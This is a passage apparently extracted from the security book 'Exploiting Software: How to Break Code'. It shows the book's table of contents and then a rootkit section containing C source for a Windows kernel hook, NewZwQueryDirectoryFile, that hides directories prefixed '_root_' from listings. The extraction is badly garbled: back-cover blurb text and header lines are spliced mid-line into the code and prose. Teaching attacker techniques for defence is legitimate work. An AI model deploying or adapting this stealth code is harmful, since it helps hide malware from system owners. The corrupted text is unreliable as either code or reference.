- •Exploiting Software How to Break Code
- •Table of Contents
- •Copyright
- •Praise for Exploiting Software
- •Attack Patterns
- •Foreword
- •Preface
- •What This Book Is About
- •How to Use This Book
- •But Isn't This Too Dangerous?
- •Acknowledgments
- •Greg's Acknowledgments
- •Gary's Acknowledgments
- •Bad Software Is Ubiquitous
- •The Trinity of Trouble
- •The Future of Software
- •What Is Software Security?
- •Conclusion
- •Chapter 2. Attack Patterns
- •A Taxonomy
- •An Open-Systems View
- •Tour of an Exploit
- •Attack Patterns: Blueprints for Disaster
- •An Example Exploit: Microsoft's Broken C++ Compiler
- •Applying Attack Patterns
- •Attack Pattern Boxes
- •Conclusion
- •Into the House of Logic
- •Should Reverse Engineering Be Illegal?
- •Reverse Engineering Tools and Concepts
- •Approaches to Reverse Engineering
- •Methods of the Reverser
- •Writing Interactive Disassembler (IDA) Plugins
- •Decompiling and Disassembling Software
- •Decompilation in Practice: Reversing helpctr.exe
- •Automatic, Bulk Auditing for Vulnerabilities
- •Writing Your Own Cracking Tools
- •Building a Basic Code Coverage Tool
- •Conclusion
- •Chapter 4. Exploiting Server Software
- •The Trusted Input Problem
- •The Privilege Escalation Problem
- •Finding Injection Points
- •Input Path Tracing
- •Exploiting Trust through Configuration
- •Specific Techniques and Attacks for Server Software
- •Conclusion
- •Chapter 5. Exploiting Client Software
- •Client-side Programs as Attack Targets
- •In-band Signals
- •Cross-site Scripting (XSS)
- •Client Scripts and Malicious Code
- •Content-Based Attacks
- •Conclusion
- •Chapter 6. Crafting (Malicious) Input
- •The Defender's Dilemma
- •Intrusion Detection (Not)
- •Partition Analysis
- •Tracing Code
- •Reversing Parser Code
- •Misclassification
- •Audit Poisoning
- •Conclusion
- •Chapter 7. Buffer Overflow
- •Buffer Overflow 101
- •Injection Vectors: Input Rides Again
- •Buffer Overflows and Embedded Systems
- •Database Buffer Overflows
- •Buffer Overflows and Java?!
- •Content-Based Buffer Overflow
- •Audit Truncation and Filters with Buffer Overflow
- •Causing Overflow with Environment Variables
- •The Multiple Operation Problem
- •Finding Potential Buffer Overflows
- •Stack Overflow
- •Arithmetic Errors in Memory Management
- •Format String Vulnerabilities
- •Heap Overflows
- •Buffer Overflows and C++
- •Payloads
- •Payloads on RISC Architectures
- •Multiplatform Payloads
- •Prolog/Epilog Code to Protect Functions
- •Conclusion
- •Chapter 8. Rootkits
- •Subversive Programs
- •A Simple Windows XP Kernel Rootkit
- •Call Hooking
- •Trojan Executable Redirection
- •Hiding Files and Directories
- •Patching Binary Code
- •The Hardware Virus
- •Low-Level Disk Access
- •Adding Network Support to a Driver
- •Interrupts
- •Key Logging
- •Advanced Rootkit Topics
- •Conclusion
- •References
- •Index
Hiding Files and Directories
While we're on the topic of hiding things using call hooks, it would make sense to hide a directo we have somewhere to place log files and utilities. Again, this can be handled through a single hook. Under NT the call hook is QueryDirectoryFile(). Our replacement version will hide any
• |
Table of Contents |
directories whose names begin with _root_. Once again, a trick like this is both convenient and |
|
• |
Index |
use. The files and directories still actually exist, and you can reference them normally. Only the
Exploitingdirectory/fileSoftwarelistingHowprogramto B eak Codewill be in the dark. You can still change locations into the directory
execute/open a hidden file. Of course, you had better remember the name you use!
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
NTSTATUS NewZwQueryDirectoryFile(
How does software break? How do attackers make software break on purpose? Why are
IN HANDLE hFile,
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
IN HANDLE hEvent OPTIONAL,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniquesINusedPIObyAPCbad_ROUTINEguys to breakIoApcRoutinesoftware. IfOPTIONAL,you want to protect your software from attack, you must first learn how real attacks are really carried out.
IN PVOID IoApcContext OPTIONAL,
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddieOUTtreatmentPIO STATUSfoundBLOCKin manypIoStatusBlock,hacking books, you will learn about
OUT PVOID FileInformationBuffer,
Why software exploit will continue to be a serious problem
IN ULONG FileInformationBufferLength,
When network security mechanisms do not work
IN FILE_INFORMATION_CLASS FileInfoClass,
Attack patterns
IN BOOLEAN bReturnOnlyOneEntry,
Reverse engineering
IN PUNICODE_STRING PathMask OPTIONAL,
Classic attacks against server software
SurprisingIN BOOLEANattacks againstbRestartQueryclient software
) Techniques for crafting malicious input
{ The technical details of buffer overflows
Rootkits
NTSTATUS rc;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
CHAR aProcessName[PROCNAMELEN];
software.
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwQueryDirectoryFile() from %s\n", aProcessName)
rc=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) |
( |
|
hFile, |
/* this is |
the directory han |
hEvent, |
|
|
IoApcRoutine, |
|
|
•Table of Contents
IoApcContext,
•Index
Exploiting Software How to Break Code
pIoStatusBlock,
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
How does software break? How do attackers make software break on purpose? Why are bRestartQuery);
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
// this code adapted from JK code, but cleaned a bit
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out. if( NT_SUCCESS( rc ) )
This must-have book may shock you—and it will certainly educate you.Getting beyond the
{
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
if(0 == memcmp(aProcessName, "_root_", 6))
When network security mechanisms do not work
{
Attack patterns
DbgPrint("rootkit: detected file/directory query from
Reverse engineering
process\n");
Classic attacks against server software
}
Surprising attacks against client software
// Look up the file object for the directory being queried
Techniques for crafting malicious input
// This flag is controlled from the kernel shell
The technical details of buffer overflows
Rootkits |
else if(g_hide_directories) |
{
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
PDirEntry p = (PDirEntry)FileInformationBuffer;
PDirEntry pLast = NULL;
BOOL bLastOne;
do
{
|
bLastOne = |
!( |
p->dwLenToNext ); |
|
|
// This block |
was used in the JK code for al |
||
|
//null.sys |
file |
information? |
|
• |
Table of Contents |
|
|
now ... -Greg |
|
// left out for |
•Index
Exploiting Software How to Break Code
//if( RtlCompareMemory( (PVOID)&p->suName[ 0
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
//(PVOID)&g_swRootSys[ 0 ], 20 ) == 20 )
//{
//p->ftCreate = fdeNull.ftCreate;
//p->ftLastAccess = fdeNull.ftLastAccess
//p->ftLastWrite = fdeNull.ftLastWrite;
How does software break? How do attackers make software break on purpose? Why are
// p->dwFileSizeHigh = fdeNull.dwFileSize firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
// p->dwFileSizeLow = fdeNull.dwFileSizeL
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
//}
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
//else
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
// compare directory-name prefix with '_root
Why software exploit will continue to be a serious problem
//decide if to hide or not.
When network security mechanisms do not work
if( RtlCompareMemory( (PVOID)&p->suName[ 0 ]
Attack patterns
(PVOID)&g_swFileHidePrefix[ 0 ], 12 ) == 12
Reverse engineering |
|
{ |
|
Classic attacks against server software |
|
Surprising attacks against client software |
if( bLastOne ) |
|
|
Techniques for crafting malicious input |
{ |
The technical details of buffer overflows |
if( p == (PDirEntry) |
Rootkits |
FileInformationBuffer ) |
rc = 0x80000006;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
else pLast->dwLenToNext =
break;
}
else
{
int iPos = ((ULONG)p) -
(ULONG)FileInformationBuffer;
int iLeft =
•Table of Contents
(DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
•Index
Exploiting Software How to Break Code
RtlCopyMemory( (PVOID)p,
ByGreg Hoglund,Gary McGraw
(PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
Publisher: Addison Wesley |
continue; |
|
Pub Date: February 17, 2004 |
||
ISBN: 0-201-78695-8 |
} |
|
Pages: 512 |
||
|
||
|
} |
|
|
pLast = p; |
How does software break? How do attackers make software break on purpose? Why are
p = (PDirEntry)((char *)p + p->dwLenToNext ) firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
} while( !bLastOne );
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
}
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
}
This must-have book may shock you—and it will certainly educate you.Getting beyond the return(rc);
script kiddie treatment found in many hacking books, you will learn about
}
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.